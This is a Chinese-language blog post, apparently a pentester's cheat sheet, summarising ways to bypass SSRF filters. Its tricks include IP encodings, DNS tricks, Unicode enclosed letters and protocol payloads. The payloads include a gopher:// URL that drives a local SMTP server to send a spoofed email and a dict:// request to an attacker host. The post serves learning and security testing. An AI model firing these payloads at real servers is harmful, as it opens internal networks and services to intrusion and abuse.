美文网首页菜鸟追梦
SSRF绕过方法总结

SSRF绕过方法总结

作者: 安全脉搏 | 来源:发表于2017-11-28 09:39 被阅读0次

前言

昨天忘了在公众号还是微博上看到的了,看到一个SSRF绕过的技巧,使用的是
ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ
绕过的,自己也没遇到过。然后想想自己对SSRF绕过还是停留在之前的了解,也没学习过新的绕过方法,所以特意找了找资料,学习学习最新黑科技,充充能。

0x00 SSRF是什么

能精简的就不扯淡,一句话就是:利用一个可以发起网络请求的服务当作跳板来攻击内部其他服务。

0x01 SSRF能干什么

  • 探测内网信息
  • 攻击内网或本地其他服务
  • 穿透防火墙
  • 。。。

0x02 SSRF怎么找

  • 能够对外发起网络请求的地方
  • 请求远程服务器资源的地方
  • 数据库内置功能
  • 邮件系统
  • 文件处理
  • 在线处理工具
  • 。。。

举几个例子:

  1. 在线识图,在线文档翻译,分享,订阅等,这些有的都会发起网络请求。
  2. 根据远程URL上传,静态资源图片等,这些会请求远程服务器的资源。
  3. 数据库的比如mongodb的copyDatabase函数,这点看猪猪侠讲的吧,没实践过。
  4. 邮件系统就是接收邮件服务器地址这些地方。
  5. 文件就找ImageMagick,xml这些。
  6. 从URL关键字中寻找,比如:source,share,link,src,imageurl,target等。

以上这些不是本文的重点,下面说下重点介绍的SSRF绕过的方法。

0x03 SSRF怎么绕

1、攻击本地

http://127.0.0.1:80
http://localhost:22

2、利用[::]

利用[::]绕过localhost
http://[::]:80/  >>>  http://127.0.0.1

也有看到利用http://0000::1:80/的,但是我测试未成功
3、利用@

http://example.com@127.0.0.1

4、利用短地址

http://dwz.cn/11SMa  >>>  http://127.0.0.1

5、利用特殊域名
利用的原理是DNS解析

http://127.0.0.1.xip.io/
http://www.owasp.org.127.0.0.1.xip.io/

6、利用DNS解析
在域名上设置A记录,指向127.0.1

7、利用上传
也不一定是上传,我也说不清,自己体会 -.-
修改"type=file"为"type=url"
比如:
上传图片处修改上传,将图片文件修改为URL,即可能触发SSRF

8、利用Enclosed alphanumerics

`利用Enclosed alphanumerics`
`ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ  >>>  example.com`
`List``:`
`① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ `
`⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ `
`⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ `
`⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ `
`Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ <img` `class``=``"emoji"`
`draggable``=``"false"`
`alt``=``"![Ⓜ](https://img.haomeiwen.com/i9193311/cb89e04b84c05fb6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
"`
`src``=``"https://s.w.org/images/core/emoji/72x72/24c2.png"``> Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ `
`ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ `
`⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ `
`⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿`

9、利用句号

127。0。0。1  >>>  127.0.0.1

10、利用进制转换

可以是十六进制,八进制等。
115.239.210.26  >>>  16373751032
首先把这四段数字给分别转成16进制,结果:73 ef d2 1a
然后把 73efd21a 这十六进制一起转换成8进制
记得访问的时候加0表示使用八进制(可以是一个0也可以是多个0 跟XSS中多加几个0来绕过过滤一样),十六进制加0x
http://127.0.0.1  >>>  http://0177.0.0.1/
http://127.0.0.1  >>>  http://2130706433/
http://192.168.0.1  >>>  http://3232235521/
http://192.168.1.1  >>>  http://3232235777/

11、利用特殊地址

http://0/

12、利用协议

Dict://
dict://<user-auth>@<host>:<port>/d:<word>
ssrf.php?url=dict://attacker:11111/
SFTP://
ssrf.php?url=sftp://example.com:11111/
TFTP://
ssrf.php?url=tftp://example.com:12346/TESTUDPPACKET
LDAP://
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
Gopher://
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a

13、使用组合
各种绕过进行自由组合即可

参考链接:

相关文章

  • SSRF绕过方法总结

    前言 昨天忘了在公众号还是微博上看到的了,看到一个SSRF绕过的技巧,使用的是ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ绕过的,自己也...

  • SSRF绕过方法总结【转载】

    SSRF绕过方法总结 0x00 SSRF是什么 能精简的就不扯淡,一句话就是:利用一个可以发起网络请求的服务当作跳...

  • SSRF绕过

    1):将IP转换为长整型 2):使用URL中有认证内容绕过:http://www.baidu.com@127.0....

  • 🎪waf绕过

    ? waf注入绕过检测方法 云waf直接找真实ip就可绕过 方法总结:绕过waf的方法: 1、白名单绕过2、大小写...

  • 云服务器报wordpress /wp-includes/http

    一、wordpress函数wp_http_validate_url畸形IP绕过验证SSRF漏洞 原文:https:...

  • ssrf原理和绕过姿势

    转自paper.tuisec.win/detail-f2b26ca1c3d5b53.html 通过ssrf利用内网...

  • SSRF

    一.本文介绍 1、本文介绍SSRF形成原因、用途、出没位置、dict、端口扫描、文件读取、绕过、防御。 二.学习步...

  • 【转】sql注入绕过方法总结

    前言 SQL在CTF每一次比赛中基本上都会出现,所以有了这一篇总结,防忘,最后更新于2018/10/11。简而言之...

  • SSRF的简单科普

    首先说一下302跳转,猪猪侠乌云上提出的,可绕过ssrf一些利用限制 支持http(s)协议的除了可以探测内网we...

  • 11.绕过waf sql注入

    绕过waf的方法:1.白名单、2改变请求方法、3.大小写绕过 、4.url编码绕过、5.组合绕过、6.复参数绕过7...

网友评论

    本文标题:SSRF绕过方法总结

    本文链接:https://www.haomeiwen.com/subject/ueksbxtx.html